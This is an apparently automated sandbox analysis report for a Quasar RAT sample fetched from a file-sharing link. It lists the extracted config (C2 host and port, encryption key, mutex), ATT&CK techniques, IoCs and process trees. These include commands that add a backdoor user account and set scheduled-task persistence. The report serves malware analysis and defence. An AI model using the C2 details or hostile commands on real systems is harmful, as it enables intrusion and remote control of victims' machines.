quasar | hxxps://gofile[.]io/d/5m5iIa

Analysis

max time kernel
201s
max time network
203s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-12-2024 17:25

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://gofile.io/d/5m5iIa

Score

10^/10

quasar office04 defense_evasion discovery evasion ransomware spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

himato667-58401.portmap.host:58401

Mutex

0e2bc079-3316-407c-a26f-115195d9fe5b

Attributes

encryption_key
D14CC6B8490A41A48C1E115285B6932B9A857EA0
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001100000002ab61-288.dat	family_quasar
behavioral1/memory/3400-290-0x0000000000F90000-0x00000000012B4000-memory.dmp	family_quasar

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1736	cmd.exe

Executes dropped EXE 16 IoCs

pid	Process
1432	Lose2himato.exe
3400	better.exe
2516	Client.exe
3748	Client.exe
3536	Client.exe
240	Client.exe
2172	Client.exe
4816	Client.exe
3900	Client.exe
3636	Client.exe
2828	Client.exe
2072	Client.exe
5012	Client.exe
4848	Client.exe
2120	Client.exe
3472	Client.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
33	discord.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\SubDir\Client.exe	better.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	better.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himato.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Lose2himato.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himato.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 14 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2664	PING.EXE
484	PING.EXE
1584	PING.EXE
4232	PING.EXE
3156	PING.EXE
340	PING.EXE
1612	PING.EXE
4320	PING.EXE
3492	PING.EXE
4212	PING.EXE
2620	PING.EXE
4024	PING.EXE
2860	PING.EXE
4472	PING.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2499603254-3415597248-1508446358-1000\{69E8FEE0-494E-470D-9582-96A5F2929093}	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 461667.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Lose2himato.exe:Zone.Identifier	msedge.exe

Runs net.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

pid	Process
2620	PING.EXE
4320	PING.EXE
3156	PING.EXE
4212	PING.EXE
2664	PING.EXE
484	PING.EXE
1584	PING.EXE
3492	PING.EXE
2860	PING.EXE
4472	PING.EXE
1612	PING.EXE
4232	PING.EXE
4024	PING.EXE
340	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1408	schtasks.exe
4596	schtasks.exe
3876	schtasks.exe
3576	schtasks.exe
2144	schtasks.exe
4632	schtasks.exe
2396	schtasks.exe
3920	schtasks.exe
2936	schtasks.exe
5008	schtasks.exe
2384	schtasks.exe
1788	schtasks.exe
2336	schtasks.exe
4336	schtasks.exe
4292	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2928	msedge.exe
2928	msedge.exe
3068	msedge.exe
3068	msedge.exe
4676	identity_helper.exe
4676	identity_helper.exe
4344	msedge.exe
4344	msedge.exe
1520	msedge.exe
1520	msedge.exe
772	msedge.exe
772	msedge.exe
3728	msedge.exe
3728	msedge.exe
2024	msedge.exe
2024	msedge.exe
4412	msedge.exe
4412	msedge.exe
2308	identity_helper.exe
2308	identity_helper.exe
4948	msedge.exe
4948	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	3400	better.exe
Token: SeDebugPrivilege	2516	Client.exe
Token: SeDebugPrivilege	3748	Client.exe
Token: SeDebugPrivilege	3536	Client.exe
Token: SeDebugPrivilege	240	Client.exe
Token: SeDebugPrivilege	2172	Client.exe
Token: SeDebugPrivilege	4816	Client.exe
Token: SeDebugPrivilege	3900	Client.exe
Token: SeDebugPrivilege	3636	Client.exe
Token: SeDebugPrivilege	2828	Client.exe
Token: SeDebugPrivilege	2072	Client.exe
Token: SeDebugPrivilege	5012	Client.exe
Token: SeShutdownPrivilege	2384	shutdown.exe
Token: SeRemoteShutdownPrivilege	2384	shutdown.exe
Token: SeDebugPrivilege	4848	Client.exe
Token: SeDebugPrivilege	2120	Client.exe
Token: SeDebugPrivilege	3472	Client.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
3068	msedge.exe
2516	Client.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
3748	Client.exe
3536	Client.exe
240	Client.exe
2172	Client.exe
4816	Client.exe
3900	Client.exe
3636	Client.exe
2828	Client.exe
2072	Client.exe
5012	Client.exe
4848	Client.exe
2120	Client.exe
3472	Client.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3628	PickerHost.exe
2820	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 564	3068	msedge.exe	79
PID 3068 wrote to memory of 564	3068	msedge.exe	79
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2140	3068	msedge.exe	80
PID 3068 wrote to memory of 2928	3068	msedge.exe	81
PID 3068 wrote to memory of 2928	3068	msedge.exe	81
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82
PID 3068 wrote to memory of 2120	3068	msedge.exe	82

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/5m5iIa
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc976d3cb8,0x7ffc976d3cc8,0x7ffc976d3cd8
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
  2⤵
  PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:904
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,6211671906527195970,4301268772457707874,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4444

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3432

C:\Users\Admin\Downloads\Lose2himato.exe
"C:\Users\Admin\Downloads\Lose2himato.exe"
1⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1432
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4000
- - C:\Windows\SysWOW64\net.exe
    net user OWN3DbyHXM4TO /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3092
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3516
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
